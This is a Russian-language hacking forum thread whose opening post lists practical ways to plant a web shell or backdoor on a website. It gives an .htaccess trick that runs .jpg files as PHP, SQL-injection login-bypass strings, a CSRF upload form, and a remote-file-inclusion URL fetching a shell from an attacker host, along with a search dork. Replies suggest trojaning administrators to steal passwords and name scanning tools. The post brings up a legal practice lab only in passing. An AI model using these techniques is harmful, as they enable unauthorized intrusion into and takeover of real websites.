• Codeby web-security - Курс "Тестирование Веб-Приложений на проникновение с нуля" от команды codeby. Общая теория, подготовка рабочего окружения, пассивный фазинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь

Статья Способы загрузки шелла/бэкдора на сайт.

DefWolf

Mod. Cryptography
Red Team
24.10.2017
211
522
#1
В этой статье я хочу рассказать о чаще используемых способах заливки шелла на сайт. Web-shell - это некий вредоносный скрипт (программа), который злоумышленники используют для управления сайтами или серверами.

Способ 1

Найти на сайте форму для загрузки файлов/картинок. Допустим нам не удалось взломать админку сайта и мы пытаемся залить наш шелл с расширением .php.jpg . Если удалось, то мы увидим вместо картинки белое окно, мы кликаем правой кнопкой мыши и переходим по ссылке. В случае провала мы можем воспользоваться расширением chrome tamper data. Оно позволяет перехватить и изменить запрос как вы хотите. Если сайт проверяет, расширение файла, то сначала мы можем залить .htaccess файл с содержимым:
Код:
AddType application/x-httpd-php .jpg
Данная команда будет выполнять jpg файлы как php.
Подробная видеоинструкция:

Видеоинструкция по установке tamper data:

Способ 2
Воспользоваться программой для поиска админок на сайте - https://github.com/bdblackhat/admin-panel-finder. Когда программа нашла админку мы можем попробовать провести sql-injection. В поле логина и пароля сайта мы вбиваем код:
Код:
' or '1'='1
' OR 1=1/*
Если срабатывает, то мы попадаем в админку и действуем по 1 способу . Если же на сайте в панели администратора нет sql-injection, тогда мы можем попробовать сбрутить или же найти эксплоит под данную CMS.
Подробная видеоинструкция:

Способ 3

В 3 способе мы будем искать sql-injection на самом сайте. Мы может делать это вручную или же воспользуемся
Для просмотра контента необходимо: Войти или зарегистрироваться
. На форуме достаточно тем, как можно проводить инъекции, так что зайду издалека. Итак, вот мы уже нашли таблицу с логином и паролем админа расшифровываем хэши заходим в админку и радуемся. Но допустим мы не смогли расшифровать пароль и все накрылось медным тазом, тогда мы должны проверить привилегии нашего юзера. Проверяем привилегии и загружаем мини-шелл. По каким-то причинам когда я хочу вставить код сайт выдает ошбику .


Способ 4
4 способ подразумевает csrf атаку. В ниже приведенном коде нам нужно заменить http:// на ссылку нашей цели. Выбрать шелл и нажать кнопку upload.
Код:
<form method="POST" action="http://" enctype="multipart/form-data" >
<input type="file" name="Filedata"></center><br>
<input type="submit" name="Submit" value="Upload">
</form>
Подробная видеоинструкция:

Способ 5
Узнать как больше о вашей цели и подыскать эксплоит. Для этого есть очень интересный сайт -
Для просмотра контента необходимо: Войти или зарегистрироваться
. Никто и не отменял массовый взлом сайтов через уязвимости, но про это уже есть статья на форме.

Существует еще множество способов заливки шелла и рассказывать о каждом нет смысла. Если вы хотите потренироваться, то установите dvwa - это программа созданная для того, чтобы помочь профессионалам по безопасности протестировать их навыки и инструменты в легальном окружении .
 

DefWolf

Mod. Cryptography
Red Team
24.10.2017
211
522
#2
Способ 6
Php-injection - это форма атаки на сайт, когда атакующий внедряет свой php-код в атакуемое php-приложение.
Код:
www.site.ru?page=home.html
Выполнив команду мы подгрузим страницу home,html. Теперь мы попробуем подгрузить вредоносный шелл.

Код:
www.site.ru?page=http:/hacker.ru/webshell.php
Дорк: Inurl:page=

Также есть способ найти уже залитый шелл с помощью perl скрипта.
Подробная видеоинструкция:
 

pro194

Active member
30.06.2017
42
50
#3
Я знаю способ который срабатывает на 100%, но почему то не разу не видел чтобы его выкладывали, он очень простой и я без мануалов его нашёл, бурп + файл. А у вас как то все замудрено) но спасибо большое за труды! Обязательно попробую ваши методы! Пишите ещё! Очень интересно!

А вот эти jpg.php php.jpg не пролезут на сервак,

Интересно почему его все скрывают...
 

pro194

Active member
30.06.2017
42
50
#5
Ребята :) наберитесь терпения. Ждём выпуска статьи от нашего мембера “mr.ondrik” он по этой теме собрался в конкурсе участвовать и раскатает статью на более чем 3000 знаков. Там все будет в подробностях.
 

krypt0n

Well-known member
12.11.2017
75
28
#6
Я знаю способ который срабатывает на 100%, но почему то не разу не видел чтобы его выкладывали, он очень простой и я без мануалов его нашёл, бурп + файл. А у вас как то все замудрено) но спасибо большое за труды! Обязательно попробую ваши методы! Пишите ещё! Очень интересно!

А вот эти jpg.php php.jpg не пролезут на сервак,

Интересно почему его все скрывают...
через бурп пролезит)
 
Симпатии: Понравилось Ondrik8

erlan1749

Well-known member
25.10.2017
114
24
#7
Я знаю способ который срабатывает на 100%, но почему то не разу не видел чтобы его выкладывали, он очень простой и я без мануалов его нашёл, бурп + файл. А у вас как то все замудрено) но спасибо большое за труды! Обязательно попробую ваши методы! Пишите ещё! Очень интересно!

А вот эти jpg.php php.jpg не пролезут на сервак,

Интересно почему его все скрывают...
и как это сделать можешь расписать или в личку скинуть.
 

Sinistra

Премиум
08.01.2017
41
31
#9
и как это сделать можешь расписать или в личку скинуть.
В 11-ой лабаратории Pentestit реализовывался такой вектор атаки. Информация:
Для просмотра контента необходимо: Войти или зарегистрироваться
и
Для просмотра контента необходимо: Войти или зарегистрироваться
. В разделах о CRM.
 

Aceki

Member
28.11.2016
5
1
#10
Было бы интересно узнать о поиске уязвимых сайтов, в интернете не так много информации на эту тему, а SQL Dumper это уже зашквар)))
 

mCstl

Well-known member
08.08.2017
83
68
#12
Благодарю за статью. особенно за способ №2
Было бы интересно узнать о поиске уязвимых сайтов, в интернете не так много информации на эту тему, а SQL Dumper это уже зашквар)))
Не пользовался SQL Dumper, но насколько знаю это скрипт для дампа БД, не понимаю чем это может быть зашквар, по твоему нужно все руками дампить. Можно ещё вместо гидры руками пароли вводить. Если вы знаете как пользоваться инструментом, то ничего плохого в его использовании нет,не зависимо от
для поиска уязвимостей на рандоме можно пользоваться SQLiv и v3n0m. Для поиска на конкретном сайте пользуйтесь прокси вроде WebScarab, Burp или ZAP. А как найдете пускайте в SQLmap.
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Gold Team
19.10.2016
737
2 747
#13
Все гораздо проще гайсы))))
Берется сперва ищется вектор для загрузки веб шелла)
К примеру если CMS WordPress или Joomla последней версии без уязвимых плагинов - то загрузка шелла только после доступа к админ панели возможна))) И никакие тампер дата и выше описанные методы не помогут , и даже супер пупер универсальные))) Хеххех))
Если бы был супер универсальный метод у этого мембера то он бы в комментах не писал а заскринил залитый шелл на этом форуме)
 

prox00

Active member
20.04.2017
31
15
#14
Универсальный метод заливки существует:
1. Админу подсовываем троян, ратник и прочее...
2.Тырим пароли от фтп, админки и прочее...
3.Заливаем шелл.
ПРОФИТ!!!!
:) Данный способ пойдет как статья на конкурс?)))))))
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Gold Team
19.10.2016
737
2 747
#15
Универсальный метод заливки существует:
1. Админу подсовываем троян, ратник и прочее...
2.Тырим пароли от фтп, админки и прочее...
3.Заливаем шелл.
ПРОФИТ!!!!
:) Данный способ пойдет как статья на конкурс?)))))))
Хм... это не универсальный метод.
Универсальный метод - это терморектальный криптоанализ и ему подобные техники)
 

Free

Member
18.03.2017
19
14
#16
Статья интересная
На лучше использовать burp в ней выполняется все в два шага.
Спасибо за статью
 

HtOnion

Red Team
06.11.2017
582
933
#18
Я знаю способ который срабатывает на 100%, но почему то не разу не видел чтобы его выкладывали, он очень простой и я без мануалов его нашёл, бурп + файл. А у вас как то все замудрено) но спасибо большое за труды! Обязательно попробую ваши методы! Пишите ещё! Очень интересно!

А вот эти jpg.php php.jpg не пролезут на сервак,

Интересно почему его все скрывают...
Универсальный метод заливки существует:
1. Админу подсовываем троян, ратник и прочее...
2.Тырим пароли от фтп, админки и прочее...
3.Заливаем шелл.
ПРОФИТ!!!!
:) Данный способ пойдет как статья на конкурс?)))))))
Статья интересная
На лучше использовать burp в ней выполняется все в два шага.
Спасибо за статью
вот трое понтанулись что знают способы и не одной статьи)) выводы знаем только в теории и то "это не точно"))
 
Симпатии: Понравилось DefWolf

Free

Member
18.03.2017
19
14
#20
просто "бурпсюте" своего рода "швейцарский нож" для пентеста web с кучей дополнительных возможностей и плагинов, а утилита предложенная автором "темпер дата", лишь узко заточенная утилита)))
Надеюсь пользователи сайта будут более терпимыми друг к другу

---- Добавлено позже ----

друзья почему столько негатива)))
лишь о общении рождается истина)))
 
Последнее редактирование:
Вверх Снизу